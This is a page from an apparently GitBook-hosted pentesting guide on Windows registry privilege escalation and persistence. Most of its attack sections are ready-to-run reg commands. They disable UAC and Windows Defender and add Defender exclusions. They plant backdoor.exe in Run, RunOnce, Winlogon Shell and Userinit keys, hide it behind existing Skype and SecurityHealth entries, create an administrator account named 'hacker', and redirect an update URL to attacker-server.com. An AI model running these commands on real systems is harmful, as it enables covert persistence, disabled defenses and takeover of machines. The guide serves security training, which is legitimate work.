This guide is currently under development, and I greatly welcome any suggestions or feedback or at reaper.gitbook@gmail.com

Registry-based privilege escalation

WARNING: Modifying system registry keys can destabilize the system or introduce serious security risks. These techniques should only be used in controlled environments with full authorization and proper backups.

Registry Permission Weaknesses

Understanding the Windows Registry

The Windows Registry is essentially a giant database that stores all the settings and configurations for your Windows system. Think of it like a massive filing cabinet where Windows keeps all its important information.

How the Registry Works

The Registry Structure: The registry is organized like a folder tree, with main sections called "hives":

  • HKLM (HKEY_LOCAL_MACHINE) - Settings that affect the entire computer

  • HKCU (HKEY_CURRENT_USER) - Settings specific to the currently logged-in user

  • HKU (HKEY_USERS) - Settings for all user accounts on the computer

  • HKCR (HKEY_CLASSES_ROOT) - File associations and COM object information

  • HKCC (HKEY_CURRENT_CONFIG) - Hardware configuration information

Registry Keys and Values:

  • Keys are like folders - they contain other keys or values

  • Values are like files - they store actual data (text, numbers, etc.)

  • Data Types include strings (REG_SZ), numbers (REG_DWORD), and others

Real-World Example

Let's say you install a program called "SuperApp". Here's what happens in the registry:

  1. Installation Entry: Windows creates HKLM\SOFTWARE\SuperApp\

  2. Settings Storage: The app stores its settings like InstallPath=C:\Program Files\SuperApp

  3. Startup Entry: If it starts with Windows, it adds HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SuperApp=C:\Program Files\SuperApp\app.exe

Why Registry Permissions Matter

Every registry key has permissions just like files and folders. These permissions control:

  • Who can read the key and its values

  • Who can write new values or modify existing ones

  • Who can delete keys or values

  • Who can change permissions on the key

The Problem: Sometimes when software is installed, the permissions get set incorrectly. For example:

  • A key that should only be writable by administrators might be writable by regular users

  • Critical system settings might have overly permissive access

  • Application configuration keys might allow unauthorized modifications

How Registry Attacks Work Step-by-Step

Step 1: Find Writable Keys An attacker looks for registry keys they can modify but shouldn't be able to. For example, if HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run is writable by regular users, that's a problem.

Step 2: Identify Impact The attacker figures out what happens if they modify this key. In this case, anything in the "Run" key automatically starts when Windows boots.

Step 3: Exploit The attacker adds their malicious program to the Run key: MyMalware=C:\temp\backdoor.exe

Step 4: Persistence Now every time Windows starts, their backdoor automatically runs with whatever privileges the registry key grants.

Understanding the Attack

The Windows Registry is like the central control panel for your entire system. It stores critical settings for Windows, applications, and security configurations. When registry keys have weak permissions, attackers can modify these settings to gain higher privileges.

Think of it like having a master control room where someone accidentally left some doors unlocked. If you can get into those rooms, you can change important system settings that you shouldn't have access to.

Why Registry Attacks Work

Registry-based privilege escalation happens because:

  • Misconfigured permissions - Administrators sometimes set wrong permissions on critical keys during software installation or system configuration

  • System-wide impact - Registry changes affect the entire system, not just your user account

  • Persistent changes - Registry modifications survive reboots and system updates

  • Direct system control - Registry controls fundamental Windows behavior including startup, security policies, and service configurations

Note: Most critical registry modifications require administrative privileges or SYSTEM context. However, misconfigurations can sometimes allow low-privileged users to modify keys they shouldn't have access to.

Enumeration

Finding Vulnerable Registry Keys

Check critical registry locations:

accesschk.exe -accepteula -kvusw "HKLM\SOFTWARE"
accesschk.exe -accepteula -kvusw "HKLM\SYSTEM"
accesschk.exe -accepteula -kvusw "HKCU\SOFTWARE"

Target high-value registry paths:

accesschk.exe -accepteula -kvusw "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies"
accesschk.exe -accepteula -kvusw "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"
accesschk.exe -accepteula -kvusw "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Authentication"

Test registry write access:

reg add "HKLM\SOFTWARE\TestKey" /v TestValue /t REG_SZ /d "test" /f 2>nul
if %errorlevel% equ 0 (
    echo [+] HKLM\SOFTWARE is writable!
    reg delete "HKLM\SOFTWARE\TestKey" /f >nul 2>&1
) else (
    echo [-] HKLM\SOFTWARE requires elevated privileges
)

Using PowerUp for registry enumeration:

Import-Module .\PowerUp.ps1
Get-RegistryAutoLogon
Get-ModifiableRegistryAutoRun

Using WinPEAS for comprehensive registry analysis:

winpeas.exe registryinfo

Exploitation Techniques

Security Policy Modification

Disable UAC (requires Administrator privileges):

reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f

Authentication Bypass

Modify Winlogon settings (requires SYSTEM or TrustedInstaller-level access):

reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultUserName /t REG_SZ /d "Administrator" /f
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultPassword /t REG_SZ /d "password" /f
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v AutoAdminLogon /t REG_SZ /d "1" /f

Security Software Bypass

Disable Windows Defender (requires SYSTEM access, may be blocked by Tamper Protection):

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableRealtimeMonitoring /t REG_DWORD /d 1 /f

Auto-Run Registry Hijacking

Understanding Auto-Run Mechanisms

Windows automatically runs programs listed in specific registry locations when the system starts or a user logs in. This is like having a startup folder that Windows checks every time it boots.

Auto-run hijacking works by:

  • Adding malicious entries to startup locations

  • Modifying existing entries to include your code

  • Using persistent locations that survive reboots

  • Leveraging user or system privileges depending on the registry location

Auto-Run Registry Locations Explained

Understanding How Windows Uses Auto-Run Keys

When Windows starts up or when you log in, it doesn't just load the operating system. It also checks specific registry locations for programs it should automatically start. This is like Windows having a checklist of "things to do when starting up."

Step-by-Step Startup Process:

  1. Windows boots up and loads core system components

  2. Windows checks HKLM Run keys and starts those programs as SYSTEM or with elevated privileges

  3. User logs in and Windows loads their profile

  4. Windows checks HKCU Run keys and starts those programs as the logged-in user

  5. Desktop appears with all auto-start programs running

Registry Key Hierarchy and Permissions

System-Wide Keys (HKLM) - Require Administrative Access:

These keys affect ALL users on the computer:

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
├── Programs here start for EVERY user when they log in
├── Requires admin rights to modify
└── Programs run with system-level privileges

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce  
├── Programs here run ONCE then the entry is deleted
├── Useful for installation or one-time setup tasks
└── Requires admin rights to modify

User-Specific Keys (HKCU) - Standard User Access:

These keys only affect the current user:

HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
├── Programs here start only for the logged-in user
├── Can be modified by the user themselves
└── Programs run with user-level privileges

HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
├── User-level one-time execution
├── Entry deleted after running
└── Standard user can modify

How Auto-Run Hijacking Works Step-by-Step

Scenario: User-Level Persistence

Let's say you're a regular user and you find you can write to HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run:

Step 1: Current State

HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
├── "Skype" = "C:\Program Files\Skype\Skype.exe"
├── "Adobe Updater" = "C:\Program Files\Adobe\Updater.exe"
└── (Your entry will go here)

Step 2: Add Malicious Entry

reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "UserConfig" /t REG_SZ /d "C:\Users\Public\backdoor.exe" /f

Step 3: New State

HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
├── "Skype" = "C:\Program Files\Skype\Skype.exe"
├── "Adobe Updater" = "C:\Program Files\Adobe\Updater.exe"
└── "UserConfig" = "C:\Users\Public\backdoor.exe"  ← Your malicious entry

Step 4: What Happens Next

  • Next time you log in, Windows reads this registry key

  • Windows automatically starts Skype, Adobe Updater, AND your backdoor

  • Your backdoor now runs every time you log in

  • It runs with your user privileges (whatever you have access to)

Understanding Special Auto-Run Locations

Winlogon Keys - Extremely Powerful but Dangerous:

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell
├── Controls what program starts as the Windows shell (usually explorer.exe)
├── If you change this, you control the entire desktop environment
└── Modifying this incorrectly can break Windows login

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit
├── Controls what programs run during user initialization
├── Default: "C:\Windows\system32\userinit.exe," (note the comma)
├── You can append your program: "C:\Windows\system32\userinit.exe,C:\backdoor.exe,"
└── Runs with high privileges during user login process

Why These Are Dangerous:

  • Shell modification - If your backdoor crashes, the user has no desktop

  • Userinit modification - If your backdoor prevents userinit from completing, user login fails

  • System instability - These locations are critical for Windows functionality

Real-World Auto-Run Example

Legitimate Software: When you install Skype, it adds this entry:

HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
"Skype" = "C:\Program Files\Skype\Phone\Skype.exe /minimized"

What an Attacker Might Do:

  1. Find the existing entry using reg query

  2. Backup the original to avoid suspicion

  3. Modify it to include their code:

reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Skype" /t REG_SZ /d "cmd.exe /c \"start \"\" \"C:\backdoor.exe\" && start \"\" \"C:\Program Files\Skype\Phone\Skype.exe\" /minimized\"" /f

Result:

  • Skype still starts normally (user doesn't notice anything wrong)

  • But the backdoor also starts silently in the background

  • User sees Skype working as expected

  • Attacker gets persistent access

Enumeration

List Current Auto-Run Entries

Basic registry queries:

reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce"
reg query "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
reg query "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce"

Check special locations:

reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Userinit
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Shell

Using Autoruns for comprehensive auto-run analysis:

autorunsc.exe -accepteula -a * -c -h -s -v

Using WinPEAS for auto-run enumeration:

winpeas.exe systeminfo | findstr /i "autorun"

Using PowerUp for auto-run checks:

Import-Module .\PowerUp.ps1
Get-ModifiableRegistryAutoRun
Get-RegistryAutoLogon

Check Auto-Run Permissions

Verify write access to auto-run keys:

accesschk.exe -accepteula -kvusw "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
accesschk.exe -accepteula -kvusw "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
accesschk.exe -accepteula -kvusw "BUILTIN\Users" "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"

Exploitation Techniques

Adding New Auto-Run Entries

System-wide persistence (requires Administrator privileges):

reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SecurityUpdate" /t REG_SZ /d "C:\Windows\System32\backdoor.exe" /f

User-level persistence (standard user access):

reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "UserConfig" /t REG_SZ /d "C:\Users\Public\backdoor.exe" /f

One-time execution:

reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce" /v "Install" /t REG_SZ /d "cmd.exe /c \"net user hacker Password123! /add && net localgroup administrators hacker /add\"" /f

Note: RunOnce entries execute only once after creation and are removed after execution. For ongoing persistence, use Run keys or scheduled tasks.

Hijacking Existing Entries

Backup existing entry first:

reg export "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" autorun_backup.reg

Modify existing entry with command chaining:

reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /t REG_SZ /d "cmd.exe /c \"start \"\" \"C:\backdoor.exe\" && start \"\" \"C:\Windows\System32\SecurityHealthSystray.exe\"\"" /f

Advanced Persistence

Modify Winlogon Shell (requires SYSTEM or TrustedInstaller access):

reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Shell /t REG_SZ /d "cmd.exe /c \"start \"\" \"explorer.exe\" && start \"\" \"C:\backdoor.exe\"\"" /f

Modify Userinit (requires SYSTEM or TrustedInstaller access):

reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Userinit
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Userinit /t REG_SZ /d "C:\Windows\system32\userinit.exe,C:\backdoor.exe," /f

User-level shell modification:

reg add "HKCU\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Shell /t REG_SZ /d "cmd.exe /c \"start \"\" \"explorer.exe\" && start \"\" \"C:\backdoor.exe\"\"" /f

Application Configuration Tampering

Understanding Application Registry Settings

Many applications store their configuration, security settings, and privilege information in the registry. When these keys have weak permissions, you can modify application behavior to escalate privileges.

This is like finding an application's control panel and changing its security settings to work in your favor.

Common Vulnerable Patterns

Applications often store:

  • Security configurations - Authentication requirements, privilege settings

  • File paths - Executable locations, plugin directories

  • Update mechanisms - Server URLs, automatic update settings

  • Feature toggles - Admin mode switches, security feature controls

Enumeration

Finding Application Registry Keys

Using RegRipper for comprehensive registry analysis:

rip.exe -r SYSTEM -p all
rip.exe -r SOFTWARE -p all

Using Registry Explorer for manual analysis:

RegistryExplorer.exe

Search for interesting application settings:

reg query "HKLM\SOFTWARE" /s | findstr /i "password\|credential\|token\|key"
reg query "HKCU\SOFTWARE" /s | findstr /i "admin\|privilege\|security"

Check permissions on common applications:

accesschk.exe -accepteula -kvusw "HKLM\SOFTWARE\TeamViewer"
accesschk.exe -accepteula -kvusw "HKCU\SOFTWARE\AnyDesk"

Using Seatbelt for application enumeration:

Seatbelt.exe InterestingFiles
Seatbelt.exe RegistryAutoRuns

Exploitation Techniques

Security Software Bypass

Check Windows Defender settings:

reg query "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /s
accesschk.exe -accepteula -kvusw "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender"

Disable Windows Defender (requires SYSTEM access, may be blocked by Tamper Protection):

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableRealtimeMonitoring /t REG_DWORD /d 1 /f

Add exclusion paths:

reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\temp" /t REG_DWORD /d 0 /f

Application Privilege Escalation

Modify application privilege settings (hypothetical example):

reg add "HKLM\SOFTWARE\ExampleApp\Security" /v RequireAdmin /t REG_DWORD /d 0 /f
reg add "HKLM\SOFTWARE\ExampleApp\Settings" /v RunAsAdmin /t REG_DWORD /d 1 /f

Hijack update mechanisms:

reg add "HKLM\SOFTWARE\ExampleApp\Update" /v UpdateURL /t REG_SZ /d "http://attacker-server.com/update" /f
reg add "HKLM\SOFTWARE\ExampleApp\Update" /v AutoUpdate /t REG_DWORD /d 1 /f

Quick Enumeration

PowerUp comprehensive registry check:

Import-Module .\PowerUp.ps1
Invoke-AllChecks | findstr /i "registry"
Get-RegistryAutoLogon
Get-ModifiableRegistryAutoRun

WinPEAS registry analysis:

winpeas.exe registryinfo
winpeas.exe quiet | findstr /i "registry\|autorun\|reg"

Seatbelt for registry security analysis:

Seatbelt.exe RegistryAutoRuns
Seatbelt.exe InterestingProcesses
Seatbelt.exe TokenPrivileges

Autoruns for complete startup analysis:

autorunsc.exe -accepteula -a * -c -h -s -v > autoruns_output.csv

Automated Tools

PowerUp registry checks:

Import-Module .\PowerUp.ps1
Get-RegistryAutoLogon
Get-ModifiableRegistryAutoRun
Invoke-AllChecks

WinPEAS comprehensive analysis:

winpeas.exe registryinfo
winpeas.exe systeminfo

Seatbelt registry enumeration:

Seatbelt.exe RegistryAutoRuns
Seatbelt.exe InterestingFiles
Seatbelt.exe TokenPrivileges

SharpUp (C# version of PowerUp):

SharpUp.exe audit
PreviousService misconfigurations and unquoted pathsNextScheduled tasks abuse

Last updated

Was this helpful?